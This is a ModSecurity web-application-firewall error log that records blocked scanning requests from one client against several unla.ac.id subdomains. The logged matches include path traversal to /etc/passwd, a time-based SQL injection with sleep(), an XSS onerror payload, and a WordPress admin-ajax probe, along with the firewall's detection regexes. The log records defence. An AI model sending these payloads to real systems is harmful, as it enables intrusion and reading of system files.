[Tue Aug 29 11:49:04.487683 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAltVaMAAAAR"]
[Tue Aug 29 11:49:05.416131 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAl4sUQAAAAf"]
[Tue Aug 29 11:49:05.422915 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAlUlggAAAA0"]
[Tue Aug 29 11:49:05.451534 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAjYrGEAAAAK"]
[Tue Aug 29 11:49:05.459812 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAj12KMAAAAa"]
[Tue Aug 29 11:49:05.468864 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAlV8DsAAAA1"]
[Tue Aug 29 11:49:05.470785 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wcCo-f0AAAkqHvEAAAAM"]
[Tue Aug 29 11:49:08.431529 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAlV8EIAAAA1"]
[Tue Aug 29 11:49:08.438023 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAkmTjIAAAAF"]
[Tue Aug 29 11:49:08.460872 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAkmTjMAAAAF"]
[Tue Aug 29 11:49:08.476845 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAmOBZQAAAAU"]
[Tue Aug 29 11:49:08.505675 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAhujEQAAAAr"]
[Tue Aug 29 11:49:09.401657 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAltVaoAAAAR"]
[Tue Aug 29 11:49:09.429570 2023] [:error] [pid 2383] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAlPmv8AAAAv"]
[Tue Aug 29 11:49:09.436375 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xcCo-f0AAAluT20AAAAe"]
[Tue Aug 29 11:49:09.439201 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAkGCacAAAAE"]
[Tue Aug 29 11:49:09.478740 2023] [:error] [pid 2449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAmRU9QAAAAh"]
[Tue Aug 29 11:49:09.496676 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAfWN@YAAAAL"]
[Tue Aug 29 11:49:09.506560 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xcCo-f0AAAkGCagAAAAE"]
[Tue Aug 29 11:49:10.379709 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAjYrGsAAAAK"]
[Tue Aug 29 11:49:10.387037 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAjy570AAAAG"]
[Tue Aug 29 11:49:10.394955 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xsCo-f0AAAlo01oAAAAJ"]
[Tue Aug 29 11:49:10.408647 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAjYrGwAAAAK"]
[Tue Aug 29 11:49:10.474803 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAk1w98AAAAY"]
[Tue Aug 29 11:49:11.644474 2023] [:error] [pid 2449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14x8Co-f0AAAmRU9gAAAAh"]
[Tue Aug 29 11:49:15.397315 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAjYrHUAAAAK"]
[Tue Aug 29 11:49:15.399470 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAmLPQoAAAAN"]
[Tue Aug 29 11:49:15.400277 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAjy58cAAAAG"]
[Tue Aug 29 11:49:15.404469 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAkyyBEAAAAW"]
[Tue Aug 29 11:49:15.409678 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAlkwj4AAAAO"]
